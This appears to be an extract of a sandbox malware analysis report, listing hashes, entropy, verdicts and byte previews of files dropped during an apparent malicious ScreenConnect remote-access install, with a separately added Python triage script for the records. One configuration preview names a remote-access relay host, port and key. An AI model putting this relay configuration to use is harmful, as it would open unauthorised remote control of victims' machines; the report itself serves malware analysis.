                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                    Entropy (8bit):4.842791478883622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):602392
                                                                                                                                                                    Entropy (8bit):6.176232491934078
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                                                                                    MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                                                    SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                                                                                    SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                                                                                    SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                    Entropy (8bit):4.842791478883622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
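The dropped-file records above are flat "Key:Value" lines, and two of them (the .NET app.config, SHA-256 87C640D3…8077) carry identical hashes but opposite Malicious verdicts, while several PE images are flagged Malicious:true with every listed AV engine at 0%. A triage script that parses the records, groups them by SHA-256 and surfaces exactly those two situations is added below as an example; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. The embedded sample is an excerpt of the report's own records (fields such as SHA1 and SSDEEP omitted); treating each "Process:" line as the start of a new record is an assumption about the extracted layout. The fingerprint helper recomputes the fields an analyst compares when the same file is recovered from a host.

```python
"""Triage helper for the flat 'Dropped Files' records of a Joe Sandbox report.

Added example, not code from the report or from Joe Sandbox. It parses the
'Key:Value' lines into records, groups them by SHA-256, and flags identical
content that received different 'Malicious' verdicts as well as files flagged
malicious while every listed AV engine reported 0%. Record boundaries
('Process:' starts a new record) are an assumption about the extracted layout.
"""
import hashlib
import math
import re
from collections import defaultdict

# Excerpt of the report's own records (constructed subset of the fields):
# one PE flagged malicious with 0% AV detection, and the same app.config twice
# with identical hashes but different Malicious flags.
SAMPLE_RECORDS = """\
Process:C:\\Windows\\System32\\msiexec.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):95512
Entropy (8bit):6.504684691533346
MD5:75B21D04C69128A7230A0998086B61AA
SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\\Windows\\System32\\msiexec.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Size (bytes):266
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
Malicious:false
Process:C:\\Windows\\System32\\msiexec.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Size (bytes):266
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
Malicious:true
"""

# Matches the per-engine bullet lines, e.g. "• Antivirus: ReversingLabs, Detection: 0%".
AV_LINE = re.compile(r"Antivirus:\s*(?P<engine>[^,]+),\s*Detection:\s*(?P<pct>\d+)%")


def parse_records(text):
    """Split the flat report text into a list of dicts, one per dropped file."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):      # assumed record delimiter
            current = {"av": []}
            records.append(current)
        if current is None:
            continue
        m = AV_LINE.search(line)
        if m:
            current["av"].append((m["engine"].strip(), int(m["pct"])))
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    return records


def conflicting_verdicts(records):
    """SHA-256 values whose records disagree on the Malicious flag."""
    by_hash = defaultdict(set)
    for r in records:
        if "SHA-256" in r and "Malicious" in r:
            by_hash[r["SHA-256"]].add(r["Malicious"])
    return sorted(h for h, flags in by_hash.items() if len(flags) > 1)


def malicious_without_av_hit(records):
    """SHA-256 of records flagged Malicious:true where every engine listed 0%."""
    return [r["SHA-256"] for r in records
            if r.get("Malicious") == "true" and r["av"]
            and all(pct == 0 for _, pct in r["av"])]


def shannon_entropy(data):
    """Bits per byte, the same scale as the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def fingerprint(data):
    """Fields to compare against a report record for a file recovered from a host."""
    return {
        "Size (bytes)": str(len(data)),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "Entropy (8bit)": shannon_entropy(data),
    }


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    print("conflicting verdicts:", conflicting_verdicts(recs))
    print("malicious, 0% AV:", malicious_without_av_hit(recs))
```

The Malicious flag is a property of the record (where and how the file was dropped), not of its content, so deduplicating by hash must keep the verdicts separate rather than merging them; conflicting_verdicts lists the hashes where that matters. A PE with Malicious:true and 0% AV coverage is where a Yara or behaviour hit, not a signature, drove the verdict, and is the first thing to look at in the Yara Hits and signature sections.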
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):842248
                                                                                                                                                                    Entropy (8bit):6.268561504485627
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                                                                                                    MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                                                                                                    SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                                                                                                    SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                                                                                                    SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):81688
                                                                                                                                                                    Entropy (8bit):5.8618809599146005
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                                                                                    MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                                                                                    SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                                                                                    SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                                                                                    SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                    Entropy (8bit):4.842791478883622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (463), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):953
                                                                                                                                                                    Entropy (8bit):5.76285111936072
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2dL9hK6E4dl/kGuanOt+qPySnLb5pUgzWvH:chh7HHiqo1nLHHWv
                                                                                                                                                                    MD5:D4A9F5EA2DA4BBD0CB33743E9BC848CE
                                                                                                                                                                    SHA1:BBEA3254495249FA96D667391BA4E90F92CBACD5
                                                                                                                                                                    SHA-256:644282531083B8CDE902CDBDB71BDC55C3AAE9225072465B66640C16A5923F27
                                                                                                                                                                    SHA-512:00186C860DAF6690F5A5D0E2B90DC76A049759562C52407BC51662F775FDE6DFFEFD036ACC4C8ADC9955E0D8F39897E6E11BDDBCF0003FE279B6D9DE31C63EC6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=sc.connectprotocol.es&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                    Entropy (8bit):0.363788168458258
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                                                    MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                                                    SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                                                    SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                                                    SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):1.310789453584447
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr+:KooCEYhgYEL0In
                                                                                                                                                                    MD5:90C43E9899FCDDBF2B005A27FA8F28E0
                                                                                                                                                                    SHA1:BEDCBBDBB4A72ED8507FDA47A7DD73F393C44E1D
                                                                                                                                                                    SHA-256:B89C573FB467C56C098C5E5E1B8DF184377C36951BC3CAD19B51F8D857E94410
                                                                                                                                                                    SHA-512:9965F58802E61069FFA1D992163455288A2D0E97998A62E6DD1BF897DC400734307EF2DFA66E51E11DDDC6EFDD2537404A54907DE0937C11C5D6402610D57C7D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8fb87c02, page size 16384, Windows version 10.0
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):0.42222520857188045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:fSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:fazag03A2UrzJDO
                                                                                                                                                                    MD5:4D5D801446B9BE54D26D2BC42A6BF8FD
                                                                                                                                                                    SHA1:51EB417D0051FC112A89170C3DCDA6B4D700942F
                                                                                                                                                                    SHA-256:CE7D3EF5371F6BB1EA1DD091A98BF7E4C69EB9364CA9A2214BDCB1D9101BD251
                                                                                                                                                                    SHA-512:DBA3201DBE6F34FF4F05D9F78F65D754ADA03AC615FB411FE1307E97D8A766E8C7C276C62A04244EE89D7E4366216A8D5F391DA5243B6C59D993B8F3F54D3239
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.07922768234169193
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ALUetYew43wn6rtUeWr6rElrWrtSurtillOE/tlnl+/rTc:Ahz93w6uOirWIu0pMP
                                                                                                                                                                    MD5:DE8BDFF35E35EEA6A3C29345B14B7142
                                                                                                                                                                    SHA1:537FE2D72F3C379552C473C37B0C181C963D3A28
                                                                                                                                                                    SHA-256:3C8A1AAD13461014A830C27AA8C71CF70804FF9D8E9B016C5F32F91AA1FEDC3C
                                                                                                                                                                    SHA-512:F71B071086862919CACF6D9B1EE6DDE95AD480294313D2205232F8C8579CED4A9C32331D8E237BF12662B63F538BAD6C79715A09D367F466C4F6EE6BA4DA415E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Desktop\f53WqfzzNt.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                    Entropy (8bit):5.36509199858051
                                                                                                                                                                    Encrypted:false
SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
MD5:1CF2352B684EF57925D98E766BA897F2
SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):746
Entropy (8bit):5.349174276064173
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
MD5:ED994980CB1AABB953B2C8ECDC745E1F
SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

Process:C:\Windows\SysWOW64\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:dropped
Size (bytes):1088392
Entropy (8bit):7.789940577622617
Encrypted:false
SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
MD5:8A8767F589EA2F2C7496B63D8CCC2552
SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):234
Entropy (8bit):4.977464602412109
Encrypted:false
SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
MD5:6F52EBEA639FD7CEFCA18D9E5272463E
SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):49152
Entropy (8bit):4.62694170304723
Encrypted:false
SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
MD5:77BE59B3DDEF06F08CAA53F0911608A5
SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):36864
Entropy (8bit):4.340550904466943
Encrypted:false
SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
MD5:4717BCC62EB45D12FFBED3A35BA20E25
SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):57344
Entropy (8bit):4.657268358041957
Encrypted:false
SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
MD5:A921A2B83B98F02D003D9139FA6BA3D8
SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):176128
Entropy (8bit):5.775360792482692
Encrypted:false
SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
MD5:5EF88919012E4A3D8A1E2955DC8C8D81
SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):548864
Entropy (8bit):6.034211651049746
Encrypted:false
SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
